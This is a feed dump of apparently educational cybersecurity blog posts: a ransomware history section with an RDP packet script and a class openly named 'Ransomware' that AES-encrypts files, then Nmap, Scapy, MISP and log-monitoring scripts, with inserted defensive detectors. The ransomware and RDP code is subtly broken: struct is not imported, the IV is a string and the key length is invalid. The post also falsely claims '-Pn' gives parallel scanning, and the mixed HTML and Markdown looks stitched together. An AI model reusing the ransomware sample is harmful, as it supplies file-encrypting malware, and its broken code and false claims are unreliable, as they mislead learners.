data = s.recv(1024)
print(data)

# Send RDP connection request packet
connection_request_packet = b'\x03\x00\x00\x2c\x0e\xd0\x00\x00\x12\x34\x00\x08\x00\x08\x00\x00\x03\xeb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
s.sendall(connection_request_packet)

data = s.recv(1024)
print(data)

# Send RDP security packet with no credentials
security_packet = b'\x03\x00\x00\x08\x02\xf0\x80'
s.sendall(security_packet)

data = s.recv(1024)
print(data)

# Send RDP negotiate security packet
negotiate_security_packet = b'\x03\x00\x00\x0c\x02\xf0\x80\x00\x01\x00\x08'
s.sendall(negotiate_security_packet)

data = s.recv(1024)
print(data)

s.close()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;As you can see, an attacker could establish a connection with an RDP server by sending various RDP packets, including a negotiation packet, a connection request packet, a security packet, and a negotiation security packet. By exploiting vulnerabilities in RDPs in this way, an attacker could potentially gain access to a victim’s system and deploy Maze ransomware to encrypt their files and steal sensitive data.&lt;/p&gt;

&lt;h2&gt;
  
  
  2021: REvil
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--MesNaeh1--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/2000/1%2A6ard55B1pyxCmaIhBLjxJg.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--MesNaeh1--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/2000/1%2A6ard55B1pyxCmaIhBLjxJg.jpeg" width="800" height="484"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;One of the most notable ransomware attacks in recent years was the REvil ransomware attack in July 2021. The attack targeted a software provider called Kaseya, which provides remote management software to other companies. The attackers were able to gain access to Kaseya’s software and distribute malware to hundreds of their clients, resulting in a widespread ransomware attack.&lt;/p&gt;

&lt;p&gt;REvil uses strong encryption to encrypt the victim’s files and demands a ransom payment in exchange for the decryption key. Like most ransomware groups of this era, it uses Bitcoin as the method of payment.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Code Sample:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import os
import random
import string
from Crypto.Cipher import AES

class Ransomware:
    def __init__(self, key):
        self.key = key

    def encrypt_file(self, in_filename, out_filename=None, chunk_size=64 * 1024):
        if not out_filename:
            out_filename = in_filename + '.enc'

        iv = ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(16)])
        encryptor = AES.new(self.key, AES.MODE_CBC, iv)

        filesize = os.path.getsize(in_filename)

        with open(in_filename, 'rb') as infile:
            with open(out_filename, 'wb') as outfile:
                outfile.write(struct.pack('&amp;lt;Q', filesize))
                outfile.write(iv)

                while True:
                    chunk = infile.read(chunk_size)
                    if len(chunk) == 0:
                        break
                    elif len(chunk) % 16 != 0:
                        chunk += b' ' * (16 - len(chunk) % 16)

                    outfile.write(encryptor.encrypt(chunk))

    def decrypt_file(self, in_filename, out_filename=None, chunk_size=24 * 1024):
        if not out_filename:
            out_filename = os.path.splitext(in_filename)[0]

        with open(in_filename, 'rb') as infile:
            orig_size = struct.unpack('&amp;lt;Q', infile.read(struct.calcsize('Q')))[0]
            iv = infile.read(16)
            decryptor = AES.new(self.key, AES.MODE_CBC, iv)

            with open(out_filename, 'wb') as outfile:
                while True:
                    chunk = infile.read(chunk_size)
                    if len(chunk) == 0:
                        break
                    outfile.write(decryptor.decrypt(chunk))

                outfile.truncate(orig_size)

# Usage example
key = b'secret_key_1234'
r = Ransomware(key)
r.encrypt_file('important_file.docx')
r.decrypt_file('important_file.docx.enc')
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;This demonstrates a basic implementation of ransomware using the AES encryption algorithm in CBC mode. The class Ransomware takes a symmetric key as an argument, which is used to initialise the class. The encrypt_file method takes an input file, generates a random initialization vector, and uses the key and initialization vector to encrypt the file in chunks, padding as necessary. The decrypt_file method reverses this process, reading in the encrypted file, extracting the initialization vector, and decrypting the file chunk by chunk.&lt;/p&gt;

&lt;p&gt;In the usage example, a key is defined, and an instance of the Ransomware class is created using this key. The encrypt_file method is called on a file called 'important_file.docx', which creates an encrypted file called 'important_file.docx.enc'. Finally, the decrypt_file method is called on the encrypted file to decrypt it back to its original form.&lt;/p&gt;
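&lt;p&gt;The two file-encrypting classes in this article (CryptoLocker above and Ransomware here) produce the same kind of output: an 8-byte size header, a 16-byte IV and CBC ciphertext whose bytes are statistically indistinguishable from random. The check below is an added example, not code from the article, of how a defender turns that property into a detection: it scores the byte entropy of written data, excludes compressed formats that are legitimately high-entropy (a .docx is a zip archive), and raises an alert when many suspicious writes land in a short window, which is what an encryptor walking a directory tree looks like. The thresholds, the suffix list and the sample buffers are assumptions made for this example; only the ".enc" suffix comes from the article's classes.&lt;/p&gt;

```python
import math

# Added example, not code from the article: a defender-side check that flags
# writes which look like the output of the file encryptor above. AES-CBC
# ciphertext is indistinguishable from random bytes, so its byte entropy sits
# near the 8-bit maximum, while documents and source code sit well below.
# Compressed formats are also high-entropy, so they are excluded by magic
# number first. Thresholds, suffixes and sample data are assumptions for this
# example (only the ".enc" suffix comes from the article's classes).

ENTROPY_THRESHOLD = 7.5          # bits per byte; assumed cut-off
ENCRYPTED_SUFFIXES = (".enc",)   # suffix written by the article's classes

# Magic numbers of legitimately high-entropy formats (a .docx is a zip).
COMPRESSED_MAGIC = (
    b"\x1f\x8b",          # gzip
    b"PK\x03\x04",        # zip, docx, xlsx, jar
    b"\x89PNG",           # png
    b"\xff\xd8\xff",      # jpeg
    b"\x28\xb5\x2f\xfd",  # zstd
    b"\xfd7zXZ\x00",      # xz
)

def shannon_entropy(data):
    """Bits of entropy per byte: 0.0 for empty or constant input, at most 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    total = len(data)
    entropy = 0.0
    for c in counts:
        if c:
            p = c / total
            entropy -= p * math.log2(p)
    return entropy

def is_compressed_format(data):
    return any(data.startswith(magic) for magic in COMPRESSED_MAGIC)

def classify_write(name, data, sample_size=4096):
    """Classify one file write as 'encrypted-suffix', 'high-entropy' or 'benign'."""
    if name.lower().endswith(ENCRYPTED_SUFFIXES):
        return "encrypted-suffix"
    if is_compressed_format(data):
        return "benign"
    head = data[:sample_size]          # a prefix is enough to judge entropy
    if len(head) >= 64 and shannon_entropy(head) > ENTROPY_THRESHOLD:
        return "high-entropy"
    return "benign"

def burst_alert(events, window_seconds=10.0, threshold=20):
    """events: iterable of (timestamp, filename, data). True when at least
    `threshold` suspicious writes land inside any window_seconds span."""
    times = sorted(t for t, name, data in events
                   if classify_write(name, data) != "benign")
    start = 0
    for end, t in enumerate(times):
        while t - times[start] > window_seconds:   # slide the window forward
            start += 1
        if end - start + 1 >= threshold:
            return True
    return False

# Constructed sample inputs (not real files): English text, a buffer with the
# flat byte histogram of ciphertext, and the same buffer behind a gzip header.
TEXT_SAMPLE = b"The quick brown fox jumps over the lazy dog. " * 100
CIPHERTEXT_LIKE = bytes(range(256)) * 16
GZIP_LIKE = b"\x1f\x8b" + CIPHERTEXT_LIKE

if __name__ == "__main__":
    for name, data in [("notes.txt", TEXT_SAMPLE), ("notes.txt", CIPHERTEXT_LIKE),
                       ("backup.gz", GZIP_LIKE), ("notes.txt.enc", CIPHERTEXT_LIKE)]:
        print(f"{name}: entropy={shannon_entropy(data):.2f} verdict={classify_write(name, data)}")
    writes = [(i * 0.1, f"doc{i}.docx.enc", CIPHERTEXT_LIKE) for i in range(25)]
    print("burst alert:", burst_alert(writes))
```

&lt;p&gt;On a real host the (timestamp, filename, data) tuples would come from a file-system event source such as inotify, and only the first few kilobytes of each write are needed for the entropy score. The magic-number exclusion is what keeps a user saving a batch of photos or archives from tripping the alert.&lt;/p&gt;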

&lt;p&gt;I hope that this article gives some much-needed perspective of how ransomware has evolved and how it is &lt;strong&gt;our biggest threat&lt;/strong&gt; due to the ease of deployment and instant monetisation of illegal activity. However, it must be remembered the strides in recent years to expose and educate the general public on these matters.&lt;/p&gt;

</description>
      <category>ransomware</category>
      <category>cybersecurity</category>
      <category>python</category>
      <category>scripting</category>
    </item>
    <item>
      <title>Improve Nmap Performance with These Brilliant Scripts</title>
      <dc:creator>William Baptist</dc:creator>
      <pubDate>Tue, 09 May 2023 23:28:44 +0000</pubDate>
      <link>https://dev.to/baptistsec/improve-nmap-performance-with-these-brilliant-scripts-2kc0</link>
      <guid>https://dev.to/baptistsec/improve-nmap-performance-with-these-brilliant-scripts-2kc0</guid>
      <description>&lt;p&gt;In this article, I will show you how to fix &lt;a href="https://nmap.org/docs.html" rel="noopener noreferrer"&gt;Nmap&lt;/a&gt; performance issues using Python scripts. By the end of this article, you will have a better understanding of how Nmap works and how you can use Python to extend its capabilities.&lt;/p&gt;

&lt;h2&gt;
  
  
  Identifying Performance Bottlenecks in Nmap
&lt;/h2&gt;

&lt;p&gt;Before you start fixing Nmap performance issues, you need to identify the bottlenecks in the scanning process. I know firsthand what bottlenecks are, as I once tried to run an Nmap scan on a very slow computer. Let’s just say I had plenty of time to eat lunch.&lt;/p&gt;

&lt;p&gt;To identify the bottlenecks in Nmap, you need to understand how it performs each of its scanning techniques. You can use the “-d” flag to increase the debug level of Nmap and see what is happening under the hood.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;For example, if you want to see what Nmap is doing when it performs a TCP port scan, you can use the following command:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -d -p 1-65535 &amp;lt;target&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;This will run an Nmap scan with debug output enabled for TCP port scanning. Look at the output and see where Nmap is spending most of its time.&lt;/p&gt;

&lt;p&gt;Another useful tool for identifying performance bottlenecks in Nmap is &lt;a href="https://www.wireshark.org/docs/" rel="noopener noreferrer"&gt;Wireshark&lt;/a&gt;. By capturing the network traffic generated by Nmap, you can see which packets are being sent and received and how long it takes for Nmap to get a response.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F3008%2F1%2ANjjhyVHgnqtiuVB0FuCvag.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F3008%2F1%2ANjjhyVHgnqtiuVB0FuCvag.png" alt="Wireshark Terminal"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Optimising Nmap Performance with Python
&lt;/h2&gt;

&lt;p&gt;Now that you’ve identified the performance bottlenecks in Nmap, you can start optimising its performance using Python. There are several ways to do this.&lt;/p&gt;

&lt;p&gt;One of the most effective ways to speed up Nmap scans is to parallelize them. Nmap supports parallel scanning using the “-Pn” flag, which tells Nmap to skip host discovery and assume that all hosts are up. You can use this flag in conjunction with Python’s multiprocessing library to run multiple Nmap scans in parallel.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Here’s an example Python script that uses multiprocessing to run Nmap scans in parallel:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import multiprocessing
import subprocess

def nmap_scan(ip):
    command = "nmap -Pn " + ip
    subprocess.call(command, shell=True)

if __name__ == '__main__':
    ips = ['192.168.1.1', '192.168.1.2', '192.168.1.3']
    with multiprocessing.Pool(processes=3) as pool:
        pool.map(nmap_scan, ips)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;This script will run Nmap scans for three IP addresses in parallel, using three processes. You can adjust the number of processes based on the number of cores on your machine.&lt;/p&gt;

&lt;p&gt;Additionally, you can further improve the performance of the script by limiting the number of ports scanned. By default, Nmap scans all 65,535 ports, but in most cases, you only need to scan a subset of those ports.&lt;/p&gt;

&lt;p&gt;To limit the number of ports scanned, you can use the “-p” flag in Nmap and specify a range of ports to scan. For example, if you only want to scan ports 1 through 1000, you can use the flag “-p 1-1000”.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Here’s an updated version of the script:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import nmap
import multiprocessing

def nmap_scan(ip):
    nm = nmap.PortScanner()
    nm.scan(ip, arguments='-sS -p 1-1000')
    print(nm.csv())

if __name__ == '__main__':
    ips = ['192.168.1.1', '192.168.1.2', '192.168.1.3']
    processes = []
    for ip in ips:
        p = multiprocessing.Process(target=nmap_scan, args=(ip,))
        processes.append(p)
        p.start()

    for p in processes:
        p.join()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;By limiting the number of ports scanned, you can reduce the amount of time it takes for Nmap to complete the scan, resulting in faster overall performance.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;With error handling and argument parsing added, the script looks like this:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import argparse
import nmap
import multiprocessing

def nmap_scan(ip):
    try:
        nm = nmap.PortScanner()
        nm.scan(ip, arguments='-sS -p 1-1000')
        print(nm.csv())
    except nmap.PortScannerError as e:
        print(f"Error while scanning {ip}: {e}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--ips', nargs='+', required=True, help='List of IP addresses to scan')
    parser.add_argument('--processes', type=int, default=multiprocessing.cpu_count(), help='Number of processes to use')
    args = parser.parse_args()

    processes = []
    for ip in args.ips:
        p = multiprocessing.Process(target=nmap_scan, args=(ip,))
        processes.append(p)
        p.start()

    for p in processes:
        p.join()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Then pass the IP addresses to scan as command-line arguments when running the script, like this:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;python nmap_scan.py --ips 192.168.1.1 192.168.1.2 192.168.1.3
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Finally, by using &lt;a href="https://docs.python.org/3/library/asyncio.html" rel="noopener noreferrer"&gt;asyncio&lt;/a&gt;, multiple scans can run concurrently without the need for multiple processes, which can significantly improve the efficiency of the code:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import argparse
import nmap
import asyncio

async def nmap_scan(ip):
    try:
        nm = nmap.PortScanner()
        nm.scan(ip, arguments='-sS -p 1-1000')
        print(nm.csv())
    except nmap.PortScannerError as e:
        print(f"Error while scanning {ip}: {e}")

async def run_scans(ips):
    tasks = [asyncio.create_task(nmap_scan(ip)) for ip in ips]
    await asyncio.gather(*tasks)

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--ips', nargs='+', required=True, help='List of IP addresses to scan')
    args = parser.parse_args()

    asyncio.run(run_scans(args.ips))
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;In this code, you define the nmap_scan function as an asynchronous function using the async keyword. Then you define a new function, run_scans, which creates a task for each IP address and runs them concurrently using asyncio.gather().&lt;/p&gt;

&lt;p&gt;Finally, you call the run_scans function using asyncio.run(), which runs the function in an event loop and returns the results.&lt;/p&gt;
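&lt;p&gt;Each of the scripts above prints its own csv() output, so the results of the parallel scans are never brought together. The script below is an added example, not code from the article, that runs one nmap process per host from a thread pool (threads are enough, since the external nmap process does the work), asks Nmap for grepable output on stdout with -oG -, and merges everything into a single dict that can be queried for open ports. It assumes nmap is on the PATH; the SAMPLE_GNMAP text is constructed to mirror what nmap -oG - prints and is what the script parses when run without target arguments.&lt;/p&gt;

```python
import shutil
import subprocess
import sys
from concurrent.futures import ThreadPoolExecutor

# Added example, not code from the article. Threads are enough here because
# the work happens in the external nmap process; each worker asks nmap for
# grepable output on stdout (-oG -) and the parsed results are merged.

def parse_gnmap(text):
    """Parse nmap grepable (-oG) output into {host: {"status": ..., "ports": [...]}}.

    A port record looks like port/state/protocol/owner/service/rpcinfo/version/
    and becomes a dict with the port, state, protocol, service and version fields.
    """
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):      # skip the "# Nmap ..." banner lines
            continue
        fields = line.split("\t")
        host = fields[0].split()[1]
        entry = results.setdefault(host, {"status": None, "ports": []})
        for field in fields[1:]:
            name, _, value = field.partition(": ")
            if name == "Status":
                entry["status"] = value.strip()
            elif name == "Ports":
                for record in value.split(", "):
                    parts = record.strip().split("/")
                    if len(parts) >= 7:
                        entry["ports"].append({
                            "port": int(parts[0]),
                            "state": parts[1],
                            "protocol": parts[2],
                            "service": parts[4],
                            "version": parts[6],
                        })
    return results

def scan_host(ip, ports="1-1000"):
    """Run one nmap scan and return its grepable output (assumes nmap on PATH)."""
    cmd = ["nmap", "-p", ports, "-oG", "-", ip]
    proc = subprocess.run(cmd, capture_output=True, text=True, check=False)
    if proc.returncode != 0:
        raise RuntimeError(f"nmap failed for {ip}: {proc.stderr.strip()}")
    return proc.stdout

def scan_all(ips, workers=4):
    """Scan hosts concurrently and merge the parsed results into one dict."""
    merged = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for output in pool.map(scan_host, ips):
            merged.update(parse_gnmap(output))
    return merged

def open_ports(results):
    """Flatten the results to a sorted list of (host, port, service) for open ports."""
    return sorted(
        (host, p["port"], p["service"])
        for host, entry in results.items()
        for p in entry["ports"]
        if p["state"] == "open"
    )

# Constructed sample of what "nmap -oG -" prints for two hosts (not real output).
SAMPLE_GNMAP = (
    "# Nmap 7.93 scan initiated as: nmap -p 1-1000 -oG - 192.168.1.1 192.168.1.2\n"
    "Host: 192.168.1.1 (router.lan)\tStatus: Up\n"
    "Host: 192.168.1.1 (router.lan)\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1//, "
    "80/open/tcp//http//nginx 1.18.0//\tIgnored State: closed (998)\n"
    "Host: 192.168.1.2 ()\tStatus: Up\n"
    "Host: 192.168.1.2 ()\tPorts: 445/open/tcp//microsoft-ds///\tIgnored State: filtered (999)\n"
    "# Nmap done -- 2 IP addresses (2 hosts up) scanned in 3.21 seconds\n"
)

if __name__ == "__main__":
    targets = sys.argv[1:]
    if targets and shutil.which("nmap"):
        results = scan_all(targets)
    else:
        results = parse_gnmap(SAMPLE_GNMAP)   # offline run on the constructed sample
    for host, port, service in open_ports(results):
        print(f"{host}\t{port}\t{service}")
```

&lt;p&gt;Run it with target IP addresses as arguments to scan for real (an unprivileged connect scan; add "-sS" to the argument list in scan_host if you run it as root), or with no arguments to exercise the parser on the constructed sample. Merging into one dict keyed by host is what makes it possible to diff two runs and spot a newly opened port.&lt;/p&gt;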

&lt;p&gt;To conclude, you’ve explored how to use Python to improve the efficiency of Nmap scans by implementing multiprocessing and error handling techniques. With these improvements, you can drastically reduce the time it takes to scan multiple IP addresses and ensure that you don’t miss any potential vulnerabilities. I hope this showcased how useful Python is to a cybersecurity professional.&lt;/p&gt;

</description>
      <category>nmap</category>
      <category>cybersecurity</category>
      <category>python</category>
      <category>scripts</category>
    </item>
    <item>
      <title>5 Cybersecurity Tasks You Should Automate</title>
      <dc:creator>William Baptist</dc:creator>
      <pubDate>Tue, 09 May 2023 23:24:55 +0000</pubDate>
      <link>https://dev.to/baptistsec/5-cybersecurity-tasks-you-should-automate-3enj</link>
      <guid>https://dev.to/baptistsec/5-cybersecurity-tasks-you-should-automate-3enj</guid>
      <description>&lt;p&gt;In this article, I’ll share 5 tasks that you can automate to save time, reduce errors, and improve overall security. So buckle up and get ready to streamline your workload with some cutting-edge automation techniques!&lt;/p&gt;

&lt;p&gt;I will provide an overview of what each task entails while showing you Python code that you are free to change for your own needs.&lt;/p&gt;

&lt;h2&gt;
  
  
  (1) Scanning for vulnerabilities
&lt;/h2&gt;

&lt;p&gt;Some people say vulnerability scanning is like trying to find a needle in a haystack. It’s more like trying to find a needle in a stack of needles. Luckily, with automation, you can let the computer do the searching for you.&lt;/p&gt;

&lt;p&gt;To automate vulnerability scanning, I wrote a script that will perform the scans automatically. I used Nmap to demonstrate how this can be done.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;First, install the Nmap library for Python using pip:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;pip install python-nmap
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Next, use the following code to scan a target IP address:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import nmap
# Create a new instance of the Nmap scanner
scanner = nmap.PortScanner()
# Define the target IP address
target = "192.168.1.1"
# Run a basic scan of the target
scanner.scan(target, arguments="-sV")
# Print the results of the scan
print(scanner.scaninfo())
print(scanner.all_hosts())
print(scanner[target].all_protocols())
print(scanner[target]['tcp'].keys())
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;This code will scan the target IP address and print the results of the scan to the console. You can modify the arguments parameter to specify the type of scan you want to run (e.g. a SYN scan or a UDP scan).&lt;/p&gt;

&lt;h2&gt;
  
  
  (2) Analyzing network traffic
&lt;/h2&gt;

&lt;p&gt;Network traffic analysis can be a complex process, but Python can help automate some of the more time-consuming aspects. One popular library for analyzing network traffic is Scapy. This library allows you to capture and analyze network packets in real-time.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;To use Scapy, first install it using pip:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;pip install scapy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;This code automatically captures and analyzes network packets:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from scapy.all import *
# Define a function to handle incoming packets
def handle_packet(packet):
    # Print the packet summary to the console
    print(packet.summary())
# Start capturing packets on the network interface
sniff(prn=handle_packet, filter="tcp port 80")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;This code will capture packets on the specified network interface and print a summary of each packet to the console. You can modify the filter parameter to capture packets on different ports or protocols.&lt;/p&gt;

&lt;h2&gt;
  
  
  (3) Searching for indicators of compromise (IOCs)
&lt;/h2&gt;

&lt;p&gt;Trying to keep up with the latest threats is like trying to drink from a firehose — there’s always more coming at you (unless you live in Flint, Michigan). But with automation, you can at least make sure you’re not drowning in the process.&lt;/p&gt;

&lt;p&gt;To automate IOC searching, I wrote a script that will search for known IOCs automatically. One popular library for this task is PyMISP, which allows you to interact with the MISP threat intelligence sharing platform.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Install PyMISP using pip:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;pip install pymisp
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Use the following code to search for IOCs in the MISP database:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from pymisp import PyMISP, MISPEvent
# Define the MISP URL and API key
url = "https://misp.example.co.uk"
key = "YOUR_API_KEY"
# Create a new instance of the PyMISP client
misp = PyMISP(url, key)
# Search for IOCs related to a specific domain name
events = misp.search('attributes:domain = "williambaptist.co.uk"')
# Print the results of the search
for event in events:
    misp_event = MISPEvent()
    misp_event.load(event)
    print(misp_event.to_json())
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;You can now automatically search the MISP database for IOCs related to the specified domain name and print the results to the console. You can modify the search parameter to look for IOCs related to different types of data.&lt;/p&gt;

&lt;h2&gt;
  
  
  (4) Monitoring system logs
&lt;/h2&gt;

&lt;p&gt;System logs can contain valuable information about system activity, including potential security breaches. Did you know that some cybersecurity analysts can read logs like they’re reading a novel? Well don’t look at me. However, as we know in reality, manually monitoring logs can be time-consuming and tedious.&lt;/p&gt;

&lt;p&gt;To automate log monitoring, I used the Python logging library to capture log data from different sources and analyze it in real-time.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Configure the logging library:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import logging
# Create a new logger instance
logger = logging.getLogger("application")
# Configure the logger to write logs to a file
handler = logging.FileHandler("application.log")
logger.addHandler(handler)
# Set the log level to INFO
logger.setLevel(logging.INFO)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;This code creates a logger and configures it to write timestamped records to application.log. Note that the logging module is for recording what your monitor finds, not for reading other programs’ logs; that part is handled by tailer below. You can modify the file path and log level to meet your specific needs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Next, install the tailer library (pip install tailer) and use the following code to follow the log file and analyze new lines as they arrive:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import tailer
# Define a function to handle incoming log data
def handle_log(line):
    # Analyze the log data for potential security breaches
    if "login failed" in line:
        logger.warning("Failed login attempt: %s", line)
# Start monitoring the system log file
log_file = "/var/log/auth.log"
for line in tailer.follow(open(log_file)):
    handle_log(line)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;This code follows the specified log file and flags new lines that look like failed logins. You can extend handle_log to look for other patterns, for example sudo failures or newly created accounts. Two caveats: /var/log/auth.log is only readable by root or the adm group on Debian-based systems, and other distributions log the same events to /var/log/secure or only to the systemd journal, so check where sshd writes on your hosts before trusting an empty result.&lt;/p&gt;
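&lt;p&gt;As an added example (mine, not the article’s code), here is the analysis logic itself, run offline over a handful of constructed auth.log lines so you can test it without root access or a live box. It replaces the single substring check with a parser for sshd’s "Failed password" and "Accepted" lines and two rules over a sliding time window per source address: a burst of failures, and the one that actually matters, a successful login from an address that has just failed repeatedly. The year is a parameter because syslog timestamps omit it; the hostnames, addresses and users are made up.&lt;/p&gt;

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of sshd lines in the Debian/Ubuntu /var/log/auth.log format
# (syslog timestamp without a year). One source guesses root's password and gets in;
# another is a user mistyping once before a normal key login.
SAMPLE_AUTH_LOG = """\
Jun  4 20:01:10 web01 sshd[2140]: Failed password for invalid user admin from 198.51.100.7 port 51022 ssh2
Jun  4 20:01:12 web01 sshd[2140]: Failed password for invalid user admin from 198.51.100.7 port 51022 ssh2
Jun  4 20:01:15 web01 sshd[2142]: Failed password for root from 198.51.100.7 port 51030 ssh2
Jun  4 20:01:17 web01 sshd[2144]: Failed password for root from 198.51.100.7 port 51031 ssh2
Jun  4 20:01:19 web01 sshd[2146]: Failed password for root from 198.51.100.7 port 51032 ssh2
Jun  4 20:01:25 web01 sshd[2148]: Accepted password for root from 198.51.100.7 port 51040 ssh2
Jun  4 20:03:00 web01 sshd[2150]: Failed password for alice from 192.0.2.10 port 40000 ssh2
Jun  4 20:04:00 web01 sshd[2152]: Accepted publickey for alice from 192.0.2.10 port 40002 ssh2
"""

# Groups: 1 timestamp, 2 host, 3 outcome, 4 user, 5 source IP
SSHD_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) (\S+) sshd\[\d+\]: "
    r"(Failed|Accepted) (?:password|publickey) for (?:invalid user )?(\S+) from (\S+) port \d+"
)

def parse_line(line, year):
    """Return (timestamp, host, outcome, user, ip), or None for lines that are not sshd auth events."""
    m = SSHD_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%b %d %H:%M:%S").replace(year=year)
    return ts, m.group(2), m.group(3), m.group(4), m.group(5)

def detect(log_text, year=2023, threshold=4, window_seconds=60, success_after=3):
    """Two rules over a sliding per-source window of failures.
    burst: threshold or more failures from one IP inside window_seconds (alerted once per IP).
    success-after-failures: a login accepted from an IP with at least success_after recent
    failures, the signal that a password guess actually worked and needs immediate response."""
    window = timedelta(seconds=window_seconds)
    recent_failures = defaultdict(deque)   # ip: timestamps of failures still inside the window
    burst_alerted = set()
    alerts = []
    for line in log_text.splitlines():
        event = parse_line(line, year)
        if event is None:
            continue
        ts, _host, outcome, user, ip = event
        recent = recent_failures[ip]
        while recent and ts - recent[0] > window:   # expire failures that left the window
            recent.popleft()
        if outcome == "Failed":
            recent.append(ts)
            if len(recent) >= threshold and ip not in burst_alerted:
                burst_alerted.add(ip)
                alerts.append((ip, "burst", f"{len(recent)} failed logins within {window_seconds}s"))
        elif len(recent) >= success_after:
            alerts.append((ip, "success-after-failures",
                           f"{user} logged in after {len(recent)} recent failures"))
    return alerts

if __name__ == "__main__":
    for ip, rule, detail in detect(SAMPLE_AUTH_LOG):
        print(f"ALERT {rule} from {ip}: {detail}")
```

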